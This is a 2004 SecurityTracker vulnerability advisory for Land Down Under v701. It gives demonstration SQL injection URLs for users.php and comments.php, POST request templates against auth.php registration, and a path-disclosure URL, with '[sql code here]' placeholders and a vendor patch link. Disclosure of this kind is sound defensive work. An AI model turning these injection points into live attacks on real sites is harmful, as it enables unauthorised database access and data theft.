Land Down Under Input Validation Holes in 'users.php' and Other Scripts Let Remote Users Inject SQL Commands
|
|
SecurityTracker Alert ID: 1012015 |
|
SecurityTracker URL: http://securitytracker.com/id/1012015
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 1 2004
|
Impact:
Disclosure of system information
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 701
|
Description:
Some input validation vulnerabilities were reported in Land Down Under. A remote user can inject SQL commands and can determine the installation path.
Positive Technologies reported that 'users.php' does not properly validate user-supplied input in several variables. A remote user can inject SQL commands. The vendor reports that not all of the input validation flaws actually permit SQL injections.
Some demonstration exploit examples are provided:
/users.php?f=1&s=1'[sql code here]&w=asc&d=50
/users.php?f=1&s=name&w=1'[sql code here]&d=50
/users.php?f=1&s=name&w=asc&d=1'[sql code here]
/users.php?f=1&s=1'[sql code here]&w=asc
/users.php?f=1&s=name&w=1'[sql code here]
/comments.php?id=1"[sql code here]
It is also reported that 'auth.php' allows SQL injection via POST commands. Some demonstration exploit examples are provided:
POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&
POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1
;
It is also reported that a remote user can supply the following type of URL to determine the installation path:
/plug.php?h=1'
|
Impact:
A remote user can inject SQL commands to be executed by the underlying database.
A remote user can determine the installation path.
|
Solution:
The vendor has issued a patch for version 701, available at:
http://www.neocrome.net/index.php?msingle&id91
|
Vendor URL: www.neocrome.net/index.php?msingle&id91 (Links to External Site)
|
Cause:
Exception handling error, Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 31 Oct 2004 19:02:02 -0500
Subject: [none]
|
Positive Technologies reported some input validation vulnerabilities in Land Down
Under v701.
It is reported that 'users.php' does not properly validate user-supplied input in
several variables. A remote user can inject SQL commands. The vendor reports that
not all of the input validation flaws actually permit SQL injections.
Some demonstration exploit examples are provided:
/users.php?f=1&s=1'[sql code here]&w=asc&d=50
/users.php?f=1&s=name&w=1'[sql code here]&d=50
/users.php?f=1&s=name&w=asc&d=1'[sql code here]
/users.php?f=1&s=1'[sql code here]&w=asc
/users.php?f=1&s=name&w=1'[sql code here]
/comments.php?id=1"[sql code here]
It is also reported that 'auth.php' allows SQL injection via POST commands. Some
demonstration exploit examples are provided:
POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1
POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1
It is also reported that a remote user can supply the following type of URL to
determine the installation path:
/plug.php?h=1'
The vendor has issued a fix, available at:
http://www.neocrome.net/index.php?msingle&id91
|
|
